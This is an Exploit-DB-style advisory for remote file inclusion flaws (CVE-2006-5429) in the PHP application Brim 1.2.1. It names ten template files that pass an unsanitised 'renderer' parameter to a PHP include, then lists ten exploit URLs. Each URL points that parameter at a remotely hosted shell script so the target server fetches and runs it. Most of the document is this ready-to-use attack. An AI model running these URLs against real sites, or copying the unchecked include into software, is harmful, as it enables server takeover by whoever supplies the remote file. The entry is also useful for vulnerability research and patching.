![$site['logo_alt']](/img/neosense-logo.png){kind=logo}
NeoSense Brim 1.2.1 - 'renderer' Multiple Remote File Inclusions
Author: mdx type: webapps platform: php port: date_added: 2006-10-16 date_updated: 2017-10-17 verified: 1 codes: OSVDB-29764;CVE-2006-5429 tags: aliases: screenshot_url: application_url: http://www.exploit-db.combrimfull-1.2.1-16_Oct_2006.zip raw file: 2589.txt
# Brim 1.2.0pre3 , 1.2.1 # # renderer Remote File Include Vulnerability # # Turkish Hacker's # # Discovered By : mdx and The_Bat_Hacker # # # #------------------------------------------------------ # Cyber-Warrior TIM # # Ay ve Y.ld.zlar Geceye Yak...r... # # the moon and the stars suit the night # ######################################################## # # Class : REmote ######################################################## # File Code Detailed #File1 :templates/barrel/template.tpl.php? #File1 :templates/sidebar/template.tpl.php? #File1 :templates/text-only/template.tpl.php? #File1 :templates/slashdot/template.tpl.php? #File1 :templates/penguin/template.tpl.php? #File1 :templates/pda/template.tpl.php? #File1 :templates/oerdec/template.tpl.php? #File1 :templates/nifty/template.tpl.php? #File1 :templates/mylook/template.tpl.php? #File1 :templates/barry/template.tpl.php? #Code : # # <?php include $renderer; ?> # ######################################################## # # # Exploit1 : http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt? # Exploit2 : http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt? # Exploit3 : http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt? # Exploit4 : http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt? # Exploit5 : http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt? # Exploit6 : http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt? # Exploit7 : http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt? # Exploit8 : http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt? # Exploit9 : http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt? # Exploit1 : http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt? # ######################################################## # _ThankX_ # # # #Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev] #Shika, xoron , real_dark_boy,Ulubatl. All Friends ######################################################## http://prdownloads.sourceforge.net/brim/brimfull-1.2.1-16_Oct_2006.zip?use_mirror=heanet # milw0rm.com [2006-10-17]